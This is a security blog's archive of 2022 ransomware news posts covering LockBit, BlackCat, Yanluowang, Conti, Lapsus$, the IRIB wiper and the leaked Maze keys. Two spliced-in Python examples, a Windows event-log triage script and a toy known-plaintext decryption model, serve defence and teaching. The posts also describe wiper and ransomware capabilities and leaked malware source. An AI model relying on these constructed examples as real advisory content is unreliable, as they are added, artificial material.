Jun 08 2022

Mandiant: “No evidence” we were hacked by LockBit ransomware

Category: Hacking, Ransomware | DISC @ 8:23 am

American cybersecurity firm Mandiant is investigating LockBit ransomware gang’s claims that they hacked the company’s network and stole data.

The ransomware group published a new page on its data leak website earlier today, saying that the 356,841 files they allegedly stole from Mandiant will be leaked online.

“All available data will be published!” the gang’s dark web leak site threatens under a timer showing just under three hours left until the countdown ends.

LockBit has yet to reveal what files it claims to have stolen from Mandiant’s systems since the file listing on the leak page is empty.

However, the page displays a 0-byte file named ‘mandiantyellowpress.com.7z’ that appears to be related to a mandiantyellowpress.com domain (registered today). Visiting this page redirects to the ninjaflex.com site.

When BleepingComputer reached out for more details on LockBit’s claims, the threat intel firm said it hadn’t yet found evidence of a breach.

“Mandiant is aware of these LockBit-associated claims. At this point, we do not have any evidence to support their claims. We will continue to monitor the situation as it develops,” Mark Karayan, Mandiant’s Senior Manager for Marketing Communications, told BleepingComputer.

These claims come after Mandiant revealed in a report published last week that the Russian Evil Corp cybercrime group has now switched to deploying LockBit ransomware on targets’ networks to evade U.S. sanctions.

Mandiant announced in March that it entered into a definitive agreement to be acquired by Google in an all-cash transaction valued at roughly $5.4 billion.

The LockBit ransomware gang has been active since September 2019 as a ransomware-as-a-service (RaaS) and relaunched as the LockBit 2.0 RaaS in June 2021 after ransomware actors were banned from posting on cybercrime forums.

Accenture, a Fortune 500 company and one of LockBit’s victims, confirmed to BleepingComputer in August 2021 that it was breached after the gang asked for a $50 million ransom not to leak data stolen from its network.

Source: BleepingComputer


Tags: LockBit, Mandiant


May 31 2022

CISA Announces Joint Ransomware Task Force

Category: Ransomware | DISC @ 10:21 am

Cybersecurity and Infrastructure Security Agency (CISA) director Jen Easterly announced the formation of a joint ransomware task force, plans for which were originally outlined in the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA).

Easterly announced the news at an Institute for Security and Technology (IST) event on May 20 in Washington, D.C., and also said the task force would have its first official meeting within the next few months.

“We’re very excited about it,” Easterly said during an event interview. “We think that this will actually build really nicely on the infrastructure and the scaffolding that we’ve developed with the [Joint Cyber Defense Collaborative] to use what we have as part of the federal cyber ecosystem and the companies that are part of the JCDC alliance to plug into the hub as envisioned in the Ransomware Task Force Report.”

She added that the FBI will co-chair the task force, which means the operational leads will be Eric Goldstein, CISA’s head of cyber, and Bryan Vorndran, the assistant director of the FBI’s Cyber Division.

CIRCIA’s Reporting Requirements

Passed as part of the omnibus spending bill in March, CIRCIA focuses on critical infrastructure companies—ranging from financial services firms to energy companies, or other entities where a cybersecurity event would impact economic security or public health and safety.

CIRCIA would require these entities to report any substantial cybersecurity incidents or ransom payments to the federal government within 72 and 24 hours, respectively. 

The Institute for Security and Technology issued a report last year that included a framework to combat the rising threat of ransomware. 

Former State Department cybersecurity coordinator Chris Painter, also a co-chair of the ransomware task force working groups, explained during the IST event that combating ransomware threats requires a high degree of coordination and cooperation between government agencies. 

“Establishing the new task force signals that this issue continues to be a priority and is a recognition that combating ransomware will take a sustained, long-term effort,” he said. “It should work to leverage federal and private sector capability to disrupt the major ransomware actors in any way possible.”

Easterly said the focus would be on operationalizing progress in an agile way and disrupting these bad actors, with CISA on the resilience/defense side.

“We want to work with all of our partners across the federal cyber ecosystem and the industry to actually be able to go after these actors in a very agile way at scale,” she said. 

She said the days of holding threat report briefings on a quarterly basis are long over; it is no longer a realistic way of protecting critical infrastructure from threats.

“We all have to be in the room all the time, sharing information constantly so that we can create that picture together, because it’s very likely that industry is going to see a cyberattack on the homeland before we see it,” Easterly said. “So, we have to be in the same room—we have to trust each other.”

Beyond Ransomware

The event also featured a keynote address from Deputy Attorney General Lisa Monaco, who announced twin initiatives from the Department of Justice.

The first is aimed at tackling illegal cryptocurrency transactions, while the second concerns the establishment of a cybersecurity operations international liaison position to speed up international operations aimed at disrupting the activities of cybersecurity threat actors globally.

“We’ve got to evolve to keep pace with the threat and the nation-states and criminal actors driving it,” Monaco said.

Matthew Warner, CTO and co-founder at Blumira, a provider of automated threat detection and response technology, said that as attacks against businesses and infrastructure have continued to grow, so has the impact of these attacks.

“Ransomware is a systemic risk to all computing at this point, which requires a unique response from governments,” he said. “To do this, however, requires a task force that can respond in a way that we have not seen before in cybersecurity.”

He explained if governments wanted to defend their and their allies’ infrastructures—commercial or not—then reducing ransomware across the globe is paramount.

Alex Ondrick, director of security operations at BreachQuest, an incident response specialist, noted that information-sharing and trust-building between government and private business is long overdue by at least a decade, but that initiatives such as JRTF could improve upon a growing private-public partnership.

“Governments have come to increasingly rely on the private sector, yet governments are only just beginning to reciprocate information-sharing,” he said. “Given new legislation and interest, CISA’s JRTF has an opportunity to increase the lines of communication and improve information-sharing.”

Ondrick added that an increasingly decentralized ransomware threat landscape has created an opportunity for more ransomware-as-a-service (RaaS) attackers and more ransomware attacks overall. 

“Ransomware has become a key fixture of cybercrime as we move towards a post-COVID-19 world, and ransomware—as related to critical infrastructure—continues to evolve,” he said. “Preventing a ransomware attack against critical infrastructure is of the utmost seriousness and urgency.”

Regarding the DoJ’s initiative tackling illegal cryptocurrency transfers, Warner pointed out that the nature of blockchain—and therefore, cryptocurrencies—means every transaction is available for the world to see.

“While attackers will try to move this money around through tumblers, in the end, it must end up somewhere to convert to usable currency,” he said. “Government and NGO initiatives have the opportunity to track cryptocurrency use and look for clusters of ransomware payments being funneled through the blockchain.”

If the target wallets and/or transfers in and out of these potential ransomware wallets can be identified, then governments can disrupt the actors by seizing cryptocurrency from them—this was the case when the U.S. seized $30 million in cryptocurrency from the NetWalker ransomware group in early 2021.

“Ransomware will only continue to grow, as will new attacks leveraged by ransomware, which means that not only the government but also all private entities must level up quickly to defend properly,” Warner said. 


Tags: CISA, Ransomware Protection Playbook, Ransomware Task Force


Apr 25 2022

BlackCat Ransomware gang breached over 60 orgs worldwide

Category: Ransomware, Security Breach | DISC @ 7:53 am

At least 60 entities worldwide have been breached by BlackCat ransomware, warns a flash report published by the U.S. FBI.

The U.S. Federal Bureau of Investigation (FBI) published a flash report that states that at least 60 entities worldwide have been breached by BlackCat ransomware (aka ALPHV and Noberus) since it started its operations in November.

“The Federal Bureau of Investigation (FBI) has released a Flash report detailing indicators of compromise (IOCs) associated with attacks involving BlackCat/ALPHV, a Ransomware-as-a-Service that has compromised at least 60 entities worldwide.” reads the flash advisory. “CISA encourages users and administrators to review the IOCs and technical details in FBI Flash CU-000167-MW and apply the recommended mitigations.”

The list of the gang’s victims includes Moncler, Swissport, and Inetum.

The BlackCat/ALPHV ransomware was first discovered in December by malware researchers from Recorded Future and MalwareHunterTeam. The malware is the first professional ransomware strain written in the Rust programming language.

BlackCat can target Windows, Linux, and VMware ESXi systems, but at this time the number of victims is limited. The popular malware researcher Michael Gillespie said that the BlackCat ransomware is “very sophisticated.”

Recorded Future experts speculate that the author of the BlackCat ransomware, known as ALPHV, was previously involved with the REvil ransomware operations.

According to the alert, many of the developers and money launderers for the gang are linked to the Darkside/Blackmatter operations.

ALPHV has been advertising the BlackCat Ransomware-as-a-Service (RaaS) on the cybercrime forums XSS and Exploit since early December. Like other ransomware groups, the gang also implements a double-extortion model, threatening to leak the stolen data if the victims don’t pay.

ALPHV is attempting to recruit affiliates for its operations, offering them between 80% and 90% of the final ransom, depending on its value. The BlackCat operations only hit a small number of victims at this time in the USA, Australia, and India.

Ransom demands range from a few hundred thousand dollars up to $3M worth of Bitcoin or Monero.

The alert includes indicators of compromise (IoCs) associated with BlackCat/ALPHV, as of mid-February 2022.

The FBI is seeking any information that can be shared related to the operations of the BlackCat ransomware operation.

Below are recommended mitigations included in the alert:

  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Regularly back up data, air gap, and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
  • Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating system defined or recognized scheduled tasks for unrecognized “actions” (for example: review the steps each scheduled task is expected to perform).
  • Review antivirus logs for indications they were unexpectedly turned off.
  • Implement network segmentation.
  • Require administrator credentials to install software.
  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
  • Use multifactor authentication where possible.
  • Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts.
  • Implement the shortest acceptable timeframe for password changes.
  • Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind.
  • Install and regularly update antivirus and anti-malware software on all hosts.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a virtual private network (VPN).
  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.
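Three of the review items above (new or unrecognized accounts, unrecognized scheduled tasks, antivirus unexpectedly turned off) turned into a small log-triage script. This is an added example, not part of the FBI flash or of any vendor tooling. The log records are constructed and use a simplified pipe-delimited form rather than real EVTX exports; the allow-lists of known accounts and task names are placeholders an organisation would replace with its own. The event IDs are the standard Windows ones: 4720 (user account created), 4732 (member added to a local security group) and 4698 (scheduled task created) in the Security log, and 5001 (real-time protection disabled) in the Defender Operational log.

```python
"""Triage Windows event records against three of the FBI flash mitigations:
new accounts, unrecognized scheduled tasks, antivirus turned off.

Added example, not part of the advisory. SAMPLE_LOG is constructed, in a
simplified "time|channel|event_id|message" form, not real EVTX output.
"""
import re
from dataclasses import dataclass

# Constructed sample records (not from any real incident).
SAMPLE_LOG = """\
2022-04-01T02:11:05|Security|4624|An account was successfully logged on. Account Name: jdoe
2022-04-01T02:14:30|Security|4720|A user account was created. New Account Name: svc_backup$ Subject Account Name: jdoe
2022-04-01T02:15:02|Security|4732|A member was added to a security-enabled local group. Member: svc_backup$ Group Name: Administrators
2022-04-01T02:16:40|Security|4698|A scheduled task was created. Task Name: \\Microsoft\\Windows\\UpdateOrchestrator\\Reboot Subject Account Name: SYSTEM
2022-04-01T02:17:11|Security|4698|A scheduled task was created. Task Name: \\sysupd Subject Account Name: svc_backup$
2022-04-01T02:18:55|Microsoft-Windows-Windows Defender/Operational|5001|Windows Defender Real-time Protection is disabled.
"""

# Placeholder allow-lists (assumed); an organisation supplies its own.
KNOWN_TASKS = {"\\Microsoft\\Windows\\UpdateOrchestrator\\Reboot"}
KNOWN_ACCOUNTS = {"jdoe"}


@dataclass
class Event:
    time: str
    channel: str
    event_id: int
    message: str


def parse_events(text: str) -> list[Event]:
    """Parse the simplified pipe-delimited records into Event objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        time, channel, eid, message = line.split("|", 3)
        events.append(Event(time, channel, int(eid), message))
    return events


def _field(pattern: str, message: str) -> str:
    """Pull a single named value out of an event message, or '?' if absent."""
    m = re.search(pattern, message)
    return m.group(1) if m else "?"


def triage(events: list[Event]) -> list[tuple[int, str]]:
    """Return (event_id, finding) pairs for records an analyst should review."""
    findings = []
    for ev in events:
        if ev.event_id == 4720:
            # Account creation outside the known provisioning set.
            new_acct = _field(r"New Account Name: (\S+)", ev.message)
            if new_acct not in KNOWN_ACCOUNTS:
                creator = _field(r"Subject Account Name: (\S+)", ev.message)
                findings.append((4720, f"unrecognized account {new_acct} created by {creator} at {ev.time}"))
        elif ev.event_id == 4732:
            # Privilege escalation via local Administrators membership.
            member = _field(r"Member: (\S+)", ev.message)
            group = _field(r"Group Name: (\S+)", ev.message)
            if group == "Administrators":
                findings.append((4732, f"{member} added to local Administrators at {ev.time}"))
        elif ev.event_id == 4698:
            # Scheduled task not on the organisation's allow-list.
            task = _field(r"Task Name: (\S+)", ev.message)
            if task not in KNOWN_TASKS:
                findings.append((4698, f"unrecognized scheduled task {task} created at {ev.time}"))
        elif ev.event_id == 5001 and "Defender" in ev.channel:
            # Antivirus real-time protection switched off.
            findings.append((5001, f"real-time protection disabled at {ev.time}"))
    return findings


if __name__ == "__main__":
    for eid, text in triage(parse_events(SAMPLE_LOG)):
        print(eid, text)
```

Run stand-alone, the script reports the account creation, the Administrators group change, the unrecognized task and the Defender event, and stays quiet about the ordinary logon and the allow-listed task. The allow-list approach is deliberate: in a real estate the noise from legitimate task and account churn is what makes these reviews hard, so the baseline is the part worth maintaining.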


Tags: BlackCat


Apr 20 2022

Kaspersky releases a free decryptor for Yanluowang ransomware

Category: Ransomware | DISC @ 8:43 am

Kaspersky discovered a flaw in the encryption process of the Yanluowang ransomware that allows victims to recover their files for free.

Researchers from Kaspersky discovered a vulnerability in the encryption process of the Yanluowang ransomware that can be exploited to recover the files encrypted by the malware without paying the ransom.

The Yanluowang ransomware was first spotted by researchers from the Symantec Threat Hunter Team in October 2021; the malware was used in highly targeted attacks against large enterprises.

The discovery is part of an investigation into an attempted ransomware attack against a large organization.

Kaspersky implemented the decrypting process for the Yanluowang ransomware in its RannohDecryptor tool. In order to decrypt their files, victims of this family of ransomware should have at least one original file.

“Kaspersky experts have analyzed the ransomware and found a vulnerability that allows decrypting files of affected users via a known-plaintext attack.” reads the post published by the company.

The Yanluowang ransomware uses different encryption routines depending on the size of the files.

Files larger than 3GB are partially encrypted in stripes (5MB encrypted after every 200MB), while files smaller than 3GB are encrypted in full from beginning to end.

For this reason, to decrypt files the following conditions must be met:

  • To decrypt small files (less than or equal to 3 GB), users need a pair of files with a size of 1024 bytes or more. This is enough to decrypt all other small files.
  • To decrypt big files (more than 3 GB), users need a pair of files (encrypted and original) no less than 3 GB in size each. This will be enough to decrypt both big and small files.

“By virtue of the above points, if the original file is larger than 3 GB, it is possible to decrypt all files on the infected system, both big and small. But if there is an original file smaller than 3 GB, then only small files can be decrypted.” continues the post.
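The two conditions above, modelled as an added example that is neither Yanluowang’s code nor Kaspersky’s RannohDecryptor. The block does two things: it computes which byte ranges of a file are ciphertext under the 3GB / 5MB / 200MB rule the post describes (assuming a 5MB stripe is encrypted first and then 200MB is skipped, repeating from offset 0), and it carries out the known-plaintext step on a toy XOR stream cipher whose keystream restarts every 1024 bytes, an assumption chosen only so that a 1024-byte pair suffices, as the post states for small files. The large-file case is shown purely as range arithmetic; the model makes no claim about how the real cipher keys the stripes.

```python
"""Model of the two facts the Kaspersky write-up relies on: only part of a
large file is ciphertext, and a known-plaintext pair recovers the keystream
needed for every other small file.

Added example; not Yanluowang's code and not Kaspersky's decryptor.
Modelling assumptions: the keystream restarts every PERIOD bytes, and large
files get a STRIPE-sized ciphertext block followed by a GAP of plaintext,
starting at offset 0.
"""
import os

GB = 1024 ** 3
MB = 1024 ** 2
BIG_THRESHOLD = 3 * GB   # files above this are striped (from the post)
STRIPE = 5 * MB          # bytes encrypted per stripe (from the post)
GAP = 200 * MB           # plaintext bytes skipped between stripes (from the post)
PERIOD = 1024            # keystream period (modelling assumption)


def encrypted_ranges(size: int) -> list[tuple[int, int]]:
    """Byte ranges [start, end) that are ciphertext for a file of `size` bytes."""
    if size <= BIG_THRESHOLD:
        return [(0, size)] if size else []
    ranges = []
    offset = 0
    while offset < size:
        ranges.append((offset, min(offset + STRIPE, size)))
        offset += STRIPE + GAP
    return ranges


def keystream_xor(data: bytes, keystream: bytes) -> bytes:
    """Toy stream cipher: XOR data with a keystream repeated every PERIOD bytes."""
    assert len(keystream) == PERIOD
    return bytes(b ^ keystream[i % PERIOD] for i, b in enumerate(data))


def recover_keystream(original: bytes, encrypted: bytes) -> bytes:
    """Known-plaintext attack: plaintext XOR ciphertext yields the keystream.

    Needs an original/encrypted pair of at least PERIOD bytes, which is the
    post's "1024 bytes or more" condition for small files.
    """
    if len(original) < PERIOD or len(original) != len(encrypted):
        raise ValueError("need an original/encrypted pair of at least 1024 bytes")
    return bytes(p ^ c for p, c in zip(original[:PERIOD], encrypted[:PERIOD]))


def decrypt_small_file(encrypted: bytes, keystream: bytes) -> bytes:
    """Decrypt a fully encrypted (small) file; XOR is its own inverse."""
    return keystream_xor(encrypted, keystream)


def demo() -> bool:
    """Recover the keystream from one pair and decrypt a different small file."""
    secret = os.urandom(PERIOD)                         # never seen by the victim
    known_plain = b"%PDF-1.7 constructed sample " * 60   # 1680 bytes, a file kept elsewhere
    known_cipher = keystream_xor(known_plain, secret)
    other_plain = b"constructed spreadsheet contents " * 40
    other_cipher = keystream_xor(other_plain, secret)
    ks = recover_keystream(known_plain, known_cipher)
    return ks == secret and decrypt_small_file(other_cipher, ks) == other_plain


if __name__ == "__main__":
    big = encrypted_ranges(4 * GB)
    print(f"4 GB file: {len(big)} stripes, {sum(e - s for s, e in big) // MB} MB encrypted")
    print("small-file recovery works:", demo())
```

Under the stated assumptions a 4GB file has 20 stripes totalling 100MB of ciphertext, which is why a striped decryptor needs an untouched copy that itself spans the stripe offsets, and why a short known-plaintext pair only unlocks the fully encrypted small files.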

The Symantec researchers noticed the use of the legitimate AdFind command line Active Directory query tool that is often abused by ransomware operators as a reconnaissance tool.

Before being deployed on compromised devices, the attackers launch a malicious tool designed to prepare the environment with the following actions:

  • Creates a .txt file with the number of remote machines to check in the command line
  • Uses Windows Management Instrumentation (WMI) to get a list of processes running on the remote machines listed in the .txt file
  • Logs all the processes and remote machine names to processes.txt

The analysis of the samples collected by the experts revealed that the Yanluowang ransomware uses the Windows API for encryption.

Once deployed, the Yanluowang ransomware stops hypervisor virtual machines, ends all processes logged by the above tool (including SQL and the backup solution Veeam), and then encrypts files. The ransomware appends the .yanluowang extension to the filenames of the encrypted files.

The ransom note (README.txt) dropped on the infected machine warns the victims not to contact law enforcement or ask ransomware negotiation firms for help. The ransomware operators threaten to launch distributed denial of service (DDoS) attacks against the victim if it does not follow their rules. They also threaten to call employees and business partners to damage the victim’s brand reputation, and to attack the victim again in a few weeks and delete its data.


Tags: Yanluowang ransomware


Mar 21 2022

Hacker leaked a new version of Conti ransomware source code on Twitter

Category: Ransomware | DISC @ 8:06 am

A Ukrainian security researcher has leaked more source code from the Conti ransomware operation to protest the gang’s position on the conflict.

A hacker leaked a new version of the Conti ransomware source code on Twitter in retaliation for the gang’s support of Russia.

The attack against the Conti ransomware and the data leak is retaliation for its support for the Russian invasion of Ukraine.


The attack will have a significant impact on the operation of the gang, considering also that many of Conti’s affiliates are Ukrainian groups.

Recently, a Ukrainian researcher leaked 60,694 internal chat messages belonging to the Conti ransomware operation after the group announced its support for Russia. He was able to access the database of the group’s XMPP chat server.

In a second round, the expert leaked the old source code for the Conti ransomware encryptor, decryptor, and builder, along with the administrative panel and the BazarBackdoor API. The leaked old Conti ransomware source code is dated September 15th, 2020.

The source code for the ransomware is contained in a password-protected archive; although the researcher did not leak the password, another expert cracked it and shared it.

The public availability of the source code could temporarily disrupt the Conti ransomware operation, because security experts can reverse engineer it to determine how it works and develop a working decryptor.

On the other hand, other threat actors could reverse engineer it to develop their own version of the threat, a circumstance that opens the door to worrisome scenarios.

Now the Ukrainian security researcher has leaked newer malware source code from the Conti ransomware operation; the code is dated January 25th, 2021.

The code appears to be more recent than the previous leak. According to BleepingComputer, Conti Leaks uploaded the source code for Conti version 3 to VirusTotal and shared a link on Twitter.

“The source code compiles without error and can be easily modified by other threat actors to use their own public keys or add new functionality.” reported BleepingComputer. “BleepingComputer compiled the source code without any issues, creating the cryptor.exe, cryptor_dll.dll, and decryptor.exe executables.”


Tags: Conti ransomware, Ransomware Protection Playbook


Mar 02 2022

NVIDIA discloses data breach after the recent ransomware attack

Category: Data Breach, Ransomware, Security Breach | DISC @ 10:31 am

Chipmaker giant Nvidia confirmed a data breach after the recently disclosed security incident; proprietary information was stolen.

The chipmaker giant Nvidia was recently the victim of a ransomware attack that impacted some of its systems for two days. The security breach is not connected to the ongoing crisis in Ukraine, according to a person familiar with the incident.

The incident also impacted the company’s developer tools and email systems, but business and commercial activities were not affected.

“Our business and commercial activities continue uninterrupted,” Nvidia said in a statement. “We are still working to evaluate the nature and scope of the event and don’t have any additional information to share at this time.”

The Lapsus$ ransomware gang is claiming responsibility for this attack; the group claims to have stolen 1 TB of data from Nvidia’s network. The gang leaked online around 20GB of data, including credentials for all Nvidia employees.

The company launched an investigation into the incident to determine the extent of the intrusion, which confirmed that the attackers had stolen data from the chipmaker.

NVIDIA said employee credentials and proprietary information were stolen during the cyberattack it announced on Friday.

The chipmaker giant discovered the intrusion on February 23; the attack also impacted its IT resources.

“Access to NVIDIA employee VPN requires the PC to be enrolled in MDM (Mobile Device Management). With this they were able to connect to a [virtual machine] we use. Yes they successfully encrypted the data,” the Lapsus$ ransomware gang wrote on its Telegram channel. “However we have a backup and it’s safe from scum! We are not hacked by a competitors groups or any sorts.”

Below is the statement shared by NVIDIA with some websites and published by BleepingComputer.

“On February 23, 2022, NVIDIA became aware of a cybersecurity incident which impacted IT resources. Shortly after discovering the incident, we further hardened our network, engaged cybersecurity incident response experts, and notified law enforcement.” reads the statement. “We have no evidence of ransomware being deployed on the NVIDIA environment or that this is related to the Russia-Ukraine conflict. However, we are aware that the threat actor took employee credentials and some NVIDIA proprietary information from our systems and has begun leaking it online. Our team is working to analyze that information. We do not anticipate any disruption to our business or our ability to serve our customers as a result of the incident.”


Tags: Big Breaches, NVIDIA data breach


Feb 24 2022

Iranian Broadcaster IRIB hit by wiper malware

Category: Ransomware | DISC @ 9:20 am

Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), was hit by a wiper malware in late January 2022.

An investigation into the attack that hit the Islamic Republic of Iran Broadcasting (IRIB) in late January revealed the involvement of a disruptive wiper malware along with other custom-made backdoors, and scripts and configuration files used to install and configure the malicious executables.

Researchers from Check Point who investigated the attack reported that the attackers used a wiper malware to disrupt the state’s broadcasting networks, damaging both TV and radio networks.

According to the experts, the effects of the attack were more serious than officially reported.

Check Point was not able to find any evidence that demonstrates a previous use of these tools, or attribute them to a specific threat actor.

During the attack, threat actors transmitted pictures of Mujahedin-e-Khalq Organization (MKO) leaders Maryam and Massoud Rajavi along with the image of Ayatollah Khamenei crossed out with red lines and the declaration “Salute to Rajavi, death to (Supreme Leader) Khamenei!”

“During a period of 10 seconds, the faces and voices of hypocrites appeared on (our) Channel One,” IRIB said.

“Our colleagues are investigating the incident. This is an extremely complex attack and only the owners of this technology could exploit and damage the backdoors and features that are installed on the systems,” Deputy IRIB chief Ali Dadi told state TV channel IRINN.

“Similar disruptions happened to the Koran Channel, Radio Javan and Radio Payam,” he added, referring to other state-affiliated broadcast channels.

The experts discovered two identical .NET samples named msdskint.exe that were used to wipe the files, drives, and MBR on the infected devices, making them unusable.

The malware also has the ability to clear Windows Event Logs, delete backups, kill processes, and change users’ passwords.

The report details the use of four backdoors in the attack:

  • WinScreeny, used to make screenshots of the victim’s computer;
  • HttpCallbackService, a Remote Administration Tool (RAT);
  • HttpService, another backdoor that listens on a specified port;
  • ServerLaunch, a C++ dropper.

Iranian officials attribute the attack to MEK, however, the opposition group itself denies any involvement.

The hacktivist group Predatory Sparrow, which claimed responsibility for the attacks against the national railway services, the transportation ministry, and the Iranian gas stations, claimed responsibility for the attack on IRIB via its Telegram channel.

“The use of wiper malware in the attack against a state entity in Iran begs us to compare the tools with those belonging to Indra, who, among other attacks, is responsible for unleashing a wiper in the Iranian Railways and Ministry of Roads systems. Although these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra’s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks happened in Iran.” the researchers conclude.


Tags: Iran, Ransomware Protection Playbook, wiper malware


Feb 22 2022

A cyber attack heavily impacted operations of Expeditors International

Category: Cyber Attack, Ransomware | DISC @ 9:45 am

American worldwide logistics and freight forwarding company Expeditors International shut down its global operations after a cyber attack.

American logistics and freight forwarding company Expeditors International was hit by a cyberattack over the weekend that paralyzed most of its operations worldwide.

Expeditors has over 18,000 employees worldwide and annual gross revenue of around $10 billion. The company discovered the attack on February 20, 2022; it has not provided details about the attack and announced that it has launched an investigation into the incident.

“Expeditors International of Washington, Inc. (NASDAQ:EXPD) announced that on February 20, 2022, we determined that our company was the subject of a targeted cyber-attack. Upon discovering the incident, we shut down most of our operating systems globally to manage the safety of our overall global systems environment.” reads the announcement published by the company. ”The situation is evolving, and we are working with global cybersecurity experts to manage the situation. While our systems are shut down we will have limited ability to conduct operations, including but not limited to arranging for shipments of freight or managing customs and distribution activities for our customers’ shipments.”

The information publicly available on the attack suggests the company was the victim of a ransomware attack and was forced to shut down its network to avoid the threat from spreading.

The attack impacted the company’s operations, including its ability to arrange shipments of freight and to manage customs and distribution activities for its customers’ shipments.

The company hired cybersecurity experts to investigate the security breach and recover from the attack.

The company warned that the incident could have a material adverse impact on its business, revenues, results of operations and reputation.

“We are incurring expenses relating to the cyber-attack to investigate and remediate this matter and expect to continue to incur expenses of this nature in the future. Depending on the length of the shutdown of our operations, the impact of this cyber-attack could have a material adverse impact on our business, revenues, results of operations and reputation.” concludes the advisory.


Tags: cyber attack, cyberwarfare, The Hacker and the State


Feb 11 2022

Spyware, ransomware and Nation-state hacking: Q&A from a recent interview

Category: Ransomware, Spyware | DISC @ 9:56 am

I transcribed a recent interview; here are some questions and answers about nation-state hacking, spyware, and cyber warfare. Enjoy!

How has spyware changed the rules of cyber security in recent years? What will cyber security look like now that those tools are all over the internet?

In the last decade, we have observed a progressive weaponization of cyberspace. NATO recognized cyberspace as a new domain of warfare. Cyberspace is the new battlefield for nation-state actors, the digital place where international crime rings operate threatening the pillars of our digital society.

Spyware is a powerful weapon in the arsenal of governments and cybercrime gangs. These tools are ever more sophisticated and are able to evade detection by using so-called zero-day exploits, allowing attackers to bypass the defenses of government organizations and businesses. Spyware allows attackers to steal sensitive info from the targets and perform a broad range of malicious activities.

Is the Pegasus spyware a game-changer?

Pegasus is probably the most popular surveillance software on the market; it has been developed by the Israeli NSO Group. Anyway, it is not the only one. Many other surveillance firms develop spyware that is abused every day in dragnet surveillance and to target journalists, dissidents, and opponents of totalitarian regimes. This software is developed for law enforcement and intelligence agencies, but it is often abused by many governments worldwide in cyber espionage operations. The surveillance business is growing in the dark and is becoming very dangerous.

Which devices are used for cyber warfare and cyber espionage?

Every technological device can be abused for cyber warfare and cyber espionage. Malware and spyware are the most common means, but do not forget the power of social network platforms, which can be used for surveillance and misinformation purposes.

Many governments have fallen victim to massive ransomware attacks from groups linked to organized crime, how bad can this new trend of hacking get?

Every day we read about major attacks targeting organizations worldwide with severe impact on their operations. The situation is getting worse despite the numerous law enforcement operations on a global scale. The number of ransomware attacks spiked in the last couple of years due to the implementation of the Ransomware-as-a-Service model; this means that tens of ransomware gangs have created a network of affiliates and provided them with their malware. Almost any criminal group can become an affiliate, obtain ransomware from a gang, and spread it, and this is amplifying the damage. Critical infrastructure is even more exposed to a new generation of threats that are more aggressive and sophisticated.

Reports are coming out linking North Korea to illegal online activities related to cryptocurrency. How are some governments using the Internet to threaten world peace in one way or another?

When dealing with nation-state actors you must consider the main motivation behind the attacks and distinguish the technique, tactics, and procedure adopted by the different state-sponsored groups.

For example, China-linked nation-state actors are more focused on cyber espionage aimed at stealing intellectual property, while Russia-linked Advanced Persistent Threat groups often operate to destabilize the political context of foreign states, carry out cyber espionage activities, and conduct disinformation campaigns. North Korea-linked threat actors carry out financially motivated attacks against banks and cryptocurrency firms worldwide to steal funds to reinvest in their military industry.

What about the resilience of countries’ infrastructure to face this kind of war?

We need norms of state behavior in cyberspace and more information sharing on cyber threats. We need to share information about attacks at an early stage, profiling the threat actors to mitigate and prevent their campaigns. It is essential to increase the level of security of critical infrastructure like power grids, power plants, and hospitals. Critical infrastructure is the main target of nation-state actors in a cyber warfare context.

Is making the internet a safe place technically possible?

Let me use the title of a famous book, “No Place to Hide”. I mean that both nation-state actors and cybercriminal organizations are spending a growing effort to increase their hacking capabilities and evasion techniques. Unfortunately, today most organizations still consider cybersecurity a cost to cut, and this approach gives attackers an immense advantage. We need a cultural change, and we must consider that a security-by-design approach is the only way to make the Internet a safe place. We also need globally recognized norms of responsible state behavior in cyberspace.

The Hacker and the State

The Cyberweapons Arms Race

Tags: Nation-state hacking, Ransomware Protection Playbook, Spyware, The Cyberweapons Arms Race, The Hacker and the State


Feb 09 2022

Master decryption keys for Maze, Egregor, and Sekhmet ransomware leaked online

Category: Information Security,RansomwareDISC @ 10:19 am

The master decryption keys for the Maze, Egregor, and Sekhmet ransomware families were released on the BleepingComputer forums by the alleged malware developer.

The Maze group was considered one of the most prominent ransomware operations since it began operating in May 2019. The gang was the first to introduce a double-extortion model in the cybercrime landscape: at the end of 2019, the Maze ransomware implemented data harvesting capabilities and the operators started threatening to release the stolen data of all victims who refused to pay the ransom.

In November 2020, the Maze ransomware operators announced that they had officially shut down their operations and denied the creation of a cartel.

The Maze operation then rebranded as Egregor in September, but in February 2021 several members of the Egregor group were arrested in Ukraine.

The Sekhmet operation was launched in March 2020 and has some similarities with the above ransomware operations.

While the TTPs of Egregor operators are almost identical to those of ProLock, the analysis of an Egregor ransomware sample obtained during an incident response conducted by Group-IB revealed that the executable code of Egregor is very similar to Sekhmet. The two strains share some core features and use similar obfuscation techniques. Egregor source code bears similarities with Maze ransomware as well.

The decryption keys for these operations have now been leaked on the BleepingComputer forums. The keys were shared by a user named ‘Topleak’ who claims to be the developer for all three operations.

“Hello, It’s developer. It was decided to release keys to the public for Egregor, Maze, Sekhmet ransomware families. also there is a little bit harmless source code of polymorphic x86/x64 modular EPO file infector m0yv detected in the wild as Win64/Expiro virus, but it is not expiro actually, but AV engines detect it like this, so no single thing in common with gazavat.” the user wrote on the forum.

“Each archive with keys have corresponding keys inside the numeric folders which equal to advert id in the config. In the “OLD” folder of maze leak is keys for it’s old version with e-mail based. Consider to make decryptor first for this one, because there were too many regular PC users for this version. Enjoy!”

